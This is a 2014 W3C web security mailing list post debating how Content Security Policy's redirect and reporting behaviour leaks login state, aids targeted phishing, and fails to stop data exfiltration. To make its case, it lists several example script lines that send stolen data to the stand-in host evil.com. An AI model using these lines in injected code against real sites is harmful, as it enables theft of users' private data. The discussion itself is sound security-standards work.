- From: Sigbjørn Vik <sigbjorn@opera.com>
- Date: Wed, 28 May 2014 17:30:54 +0200
- To: Mike West <mkwst@google.com>
- CC: Daniel Veditz <dveditz@mozilla.com>, Joel Weinberger <jww@chromium.org>, "Oda, Terri" <terri.oda@intel.com>, Michal Zalewski <lcamtuf@coredump.cx>, Egor Homakov <homakov@gmail.com>, "public-webappsec@w3.org" <public-webappsec@w3.org>, Eduardo' Vela <evn@google.com>
On 28-May-14 14:15, Mike West wrote: > On Tue, May 27, 2014 at 11:31 AM, Sigbjørn Vik <sigbjorn@opera.com > CSP allows more than just login detection, and makes login detection > even easier. > > What are the risks beyond login detection? Here is an example from earlier in this thread: -------- Original Message -------- From: Sigbjørn Vik <sigbjorn@opera.com> Date: Tue, 20 May 2014 16:18:16 +0200 E.g. forum.org automatically redirecting me to my most used forum, whether that be gay.forum.org, breast-cancer.forum.org or al-quaeda.forum.org. (Apologies for getting you all flagged in NSA's database.) > More saliently, if Tumblr indeed doesn't fall prey to this attack, then > it _also_ doesn't fall prey to the CSP-based variant. Both are > mechanisms of detecting a redirect; if the redirect doesn't happen, CSP > won't catch it either. You seem to be confusing image based redirects (what the author was looking for), with redirects in general (what is required for CSP). > Timing attacks and esoterica that > Michal outlined in earlier posts[1] aside, if the platform allows you to > read the size of an image cross-origin, then you can tell whether you > got an image or something that wasn't an image. That's enough in the > example I provided. Can you elaborate on a site owner's secure response > here? -------- Original Message -------- From: Sigbjørn Vik <sigbjorn@opera.com> Date: Thu, 27 Feb 2014 09:59:04 +0100 Static resources such as images and scripts don't need login protection, and can be served identically to logged-in and not logged-in users. (Later in the thread clarified that this does not necessarily hold in all cases, just most cases.) > Removing the hole introduced by CSP is > not doable for a site owner, even if wishing to do so. > > Sure it is: for example, rather than automatically redirecting, the site > could return a 403 response with a link to the login form if the user > isn't logged in. That would still be vulnerable to a number of the > attacks we've discussed here, but not the CSP variant. Are you suggesting that for site owners to protect themselves against the hole we are creating, all cross-domain 30x responses be exchanged for 403s? That would break a whole lot of sites, tools and use cases, and I think this is a non-starter. Feel free to modify my statement by adding a "practicably" in there though. > If lots of users are hitting your site, and you're getting violation > reports when one of them is attacked via content injection, then you > have the ability to fix that hole for everyone else, even if they were > never exposed. Agreed that reporting is good. > If we are serious about reporting, let us make a much better tool for > that, without the security issues, and which can be used not only to > determine the viability of CSP, but other site issues as well. Random > example; I would love to see a spec for a page to determine the security > level a browser awards it - CSP reporting can't do this, and it would be > silly to have one reporting tool for CSP and another for this. > > Would you mind forking this thread with a more detailed description of > what you're proposing here? I don't really understand either the > complaint or the suggestion here. I don't have a complaint :) You are saying "Reporting in CSP is good, even though it introduces a security hole". I am saying: "Reporting can be made better, and without security holes. Reporting does not have to be tied to CSP, and there are non-CSP reporting use cases." > In the network layer, if the page is blocked by CSP, replace it with > blank contents, and continue as normal. No DOM changes necessary. > Calling it "not trivial" might have been an exaggeration. :) > > How is that different/better than returning a network error, which is > what the spec currently asks for? It doesn't reveal to the page if the content was loaded or not, so no cross domain leakage, which is the current problem with the spec. > If you set a policy of `default-src 'none'`, then it is difficult for > injected content to exfiltrate data, as the requests to > `evil.com/?lots-of-juicy-data` <http://evil.com/?lots-of-juicy-data`> > will be blocked before they hit evil.com <http://evil.com>. So this is about a page where CSP has failed in protecting against script injection, and a custom script is now running, and has gathered secret data. In this case, protection against loading cross domain inline resources is meant to stop the script from sending the secret data home? I don't think that would be very difficult for such a script, here are a few random first things I'd try. * location.href="http://evil.com/?juicy_data" (optionally with a return redirect immediately afterwards) * document.onclick=function(){location.href="http://evil.com/?juicy_data"} * window.open("http://evil.com/?juicy_data") * window.open("data:text/html,<script>location.href='http://evil.com/?juicy_data'</script>") * HTTP over DNS (if the browser sends DNS lookups for juicy_data.evil.com, even without sending the request itself) * Various other technologies, websockets, workers, beacon, etc * Cross domain SVG fonts, or other obscure inlines * data: url to a plugin which uses its own network stack Browsers are not designed to resist a site wanting to leak data, and I don't think they are able to. Claiming that CSP protects against this sounds like a false promise to me. > Let me quote you ;) > "More to the point, please assume that I and everyone like me is a > terrible programmer. :)" > I do not believe most web developers are going to read the CSP spec, far > less understand it. I believe most will find a working template on > stackoverflow, and copy it in uncritically. > > In that sad, sad world where no one reads specs, I fail to see how you > can claim that developers be _more_ confused. They'd already have no > idea what's happening, and relying on magic safety dust that they > sprinkle around their sites. :) If they do read the spec, they'd be confused. If the don't read the spec, and sprinkle magic dust, they would rely on magic dust (which might just not work). Although I am not quite certain I understand how your comment relates to the part of my mail you quoted. > In the current proposal, `script-src example.com/js` > <http://example.com/js`> is equivilant to `script-src example.com > <http://example.com>` after a redirect. This isn't the best-case > scenario: it is _the_ scenario. :) For the website, yes. But the webmaster might not understand this. > CSP mitigates risks. > It isn't magic, and it isn't perfect. We explicitly state in the spec > (3rd paragraph of the introduction) that CSP isn't the first (or only!) > line of defense, and is intended as defense in depth. What else would > you like us to do to make that clear? I would like us to remove the necessity for caveats, and I would like it to work out of the box. If we need to explain exceptions to users, it is a sign that we didn't get the design right. > So the worst case scenario is that sites get > even less secure then before. > > I don't understand this conclusion. Again, `script-src example.com > <http://example.com>` is still significantly better than nothing. Script > can't load from `evil.com <http://evil.com>`, for instance. That seems > like a significant improvement. Webmasters have only so much time on hand for security. (Normally not nearly enough.) If they use their time on magic which doesn't work, they are worse off than if they had used their time on something which does work. If they spend time on implementing path restrictions, and it doesn't work, they are worse off than if they hadn't. In addition, they might actually think they are safe, making it even worse. > To weigh the risks, it is important to understand the threats. > Currently, phishing is by far the largest threat on the net, XSS is > miles behind. If phishing is critical severity, then XSS is only high > severity. > > They're both bad. I continue to believe that XSS is more problematic, > but I'm not sure there are any good arguments to be made either way. Bad > is bad. Badder is also bad. Either way: bad. In a world where we have to choose between evils, quantifying badness can be quite useful. -------- Original Message -------- From: Sigbjørn Vik <sigbjorn@opera.com> Date: Thu, 13 Feb 2014 09:50:48 +0100 Phishing is bigger problem than XSS, according to experts[1][2][3]. [...] [1] http://www.scmagazine.com/phishing-remains-most-reliable-cyber-fraud-mechanism/article/248998/ [1] http://www.proofpoint.com/uk/topten/index-roi.php [2] http://www.invincea.com/wp-content/uploads/Invincea-spear-phishing-watering-hole-drive-by-whitepaper-5.17.13.pdf > What is the scenario in which a CSP-based attack gives you leverage over > a user in ways that (significantly?) increase the risk of phishing? Email phishes rely on sending the user to a webpage. If I manage to get you to visit my page, I can show you anything I want. The more I know about you, the better I can tailor that, and CSP helps. If I use targeted phishing, I might want to know as much as possible about the target first, for which CSP is a great aid. CSP aids phishing even more in untargeted phishes, random URLs left in blog comments, shady ads (even on high profile sites), links from shady sites or similar. If I know you are logged in to a newspaper, presenting the "You need to log in to read this article" login page might be all it takes. Doing that randomly for random users would be extremely unlikely to work. > However, if attempted by non-knowledgeable webmasters, they risk making > their site less secure. > > Any policy, no matter how poorly constructed, is purely restrictive. "No > inline script." "No CSS except from these 8,000 sources." etc. I do not > understand the claim that _any_ policy makes a site less secure. That > shouldn't be possible. I think you misinterpret me. I am not saying that webmasters cannot make their sites more secure with the current CSP spec. I am saying that if they spend their time on something which doesn't work, their site will be less secure than if they spent their time wisely, especially so if they think it actually worked when it didn't. -- Sigbjørn Vik Opera Software
Received on Wednesday, 28 May 2014 15:31:28 UTC